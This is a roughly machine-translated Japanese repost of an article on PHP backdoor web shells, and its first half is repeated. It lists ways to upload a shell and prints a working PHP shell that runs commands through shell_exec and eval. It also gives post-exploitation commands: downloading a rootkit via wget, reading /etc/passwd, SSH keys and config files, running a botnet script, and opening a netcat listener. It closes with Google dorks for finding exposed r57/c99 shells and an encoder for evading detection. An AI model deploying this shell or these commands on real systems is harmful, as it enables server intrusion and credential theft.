バックドアの検索
4364 ワード
原文住所:http://resources.infosecinstitute.com/checking-out-backdoor-shells/
Web shellをアップロードする方法
1.ローカルファイルに脆弱性が含まれている-攻撃者はフォルダを介してプロパティを巡回することができる
2.リモートコマンド実行またはコマンド注入-Webサイトが追加の文字列を受信した場合、入力した文字列はWebサーバ上でコマンドを実行するパラメータとして使用されます.
3.SQLi-攻撃者アクティブウェブ管理者のusername/password後、管理権限を使用して管理パネルにアクセスし、バックドアをアップロードできます.
4. sniff
5.暴力解読-暴力解読FTP/SSHによるアクセス
6.クロスステーションスクリプト
7.社会工学
8.リモートファイルに含まれる
PHPバックドアについて説明します.
次のコードは、攻撃者実行*nixコマンドを実行します.
保存コードはbb.php、webサーバにアップロードします.末尾に追加する必要がありますか?shell=は、次のようなコマンドを実行します.
現在、開発者はバックドアshellに多くの特性を追加しています.例えば、r 57、c 99、およびAni-Shellバックドア.一部のバックドアにはメールボックスbombers、リターン、ファイルアップロード/ダウンロード、mysql dumper、sql文の実行、web fuzzer、ポートスキャンなどがあります.
保護されていないバックドアはGoogle dorkで簡単に見つけることができます:inurl:r 57.php, intitle: MagicCoder | Version X70.01, inurl:c99.php, inurl:r00t.php, inurl:mma.phpなど.
いくつかのバックドアは、PHPエンコーダを使用している攻撃者がいることを発見することができます.新しいPHPエンコーダはCarbylamineと呼ばれ、C 99とr 57が簡単に発見されないようにすることができます.Carbylamineは簡単です.
php carbylamine.php
Web shellをアップロードする方法
1.ローカルファイルに脆弱性が含まれている-攻撃者はフォルダを介してプロパティを巡回することができる
2.リモートコマンド実行またはコマンド注入-Webサイトが追加の文字列を受信した場合、入力した文字列はWebサーバ上でコマンドを実行するパラメータとして使用されます.
3.SQLi-攻撃者アクティブウェブ管理者のusername/password後、管理権限を使用して管理パネルにアクセスし、バックドアをアップロードできます.
4. sniff
5.暴力解読-暴力解読FTP/SSHによるアクセス
6.クロスステーションスクリプト
7.社会工学
8.リモートファイルに含まれる
PHPバックドアについて説明します.
次のコードは、攻撃者実行*nixコマンドを実行します.
<?php
if(isset($_GET['shell'])) echo("<pre>".shell_exec($_GET['shell']." &")."</pre>");
if(isset($_GET['php'])) echo(eval(stripcslashes($_GET['php'])));
if(isset($_GET['echo'])) echo($_GET['echo']);
?>
保存コードはbb.php、webサーバにアップロードします.末尾に追加する必要がありますか?shell=は、次のようなコマンドを実行します.
uname -a
cat /etc/issue
wget www.whateversite.com/rootkit.pl
cat /etc/passwd
cat /var/www/config.inc
find / -name netcat
ifconfig | grep eth0
perl botnet.pl
ls -la
ps aux | grep root
cat ~/.ssh/authorized_keys
cat ~/.ssh/identity.pub
cat /proc/self/environ
find / -perm -1000 -type d 2>/dev/null
find / -name perl*
find / -name python*
find / -name gcc*
find / -name cc
perl -v
python -v
ruby -v
gcc -v
nc -lvp 1337
現在、開発者はバックドアshellに多くの特性を追加しています.例えば、r 57、c 99、およびAni-Shellバックドア.一部のバックドアにはメールボックスbombers、リターン、ファイルアップロード/ダウンロード、mysql dumper、sql文の実行、web fuzzer、ポートスキャンなどがあります.
保護されていないバックドアはGoogle dorkで簡単に見つけることができます:inurl:r 57.php, intitle: MagicCoder | Version X70.01, inurl:c99.php, inurl:r00t.php, inurl:mma.phpなど.
いくつかのバックドアは、PHPエンコーダを使用している攻撃者がいることを発見することができます.新しいPHPエンコーダはCarbylamineと呼ばれ、C 99とr 57が簡単に発見されないようにすることができます.Carbylamineは簡単です.
php carbylamine.php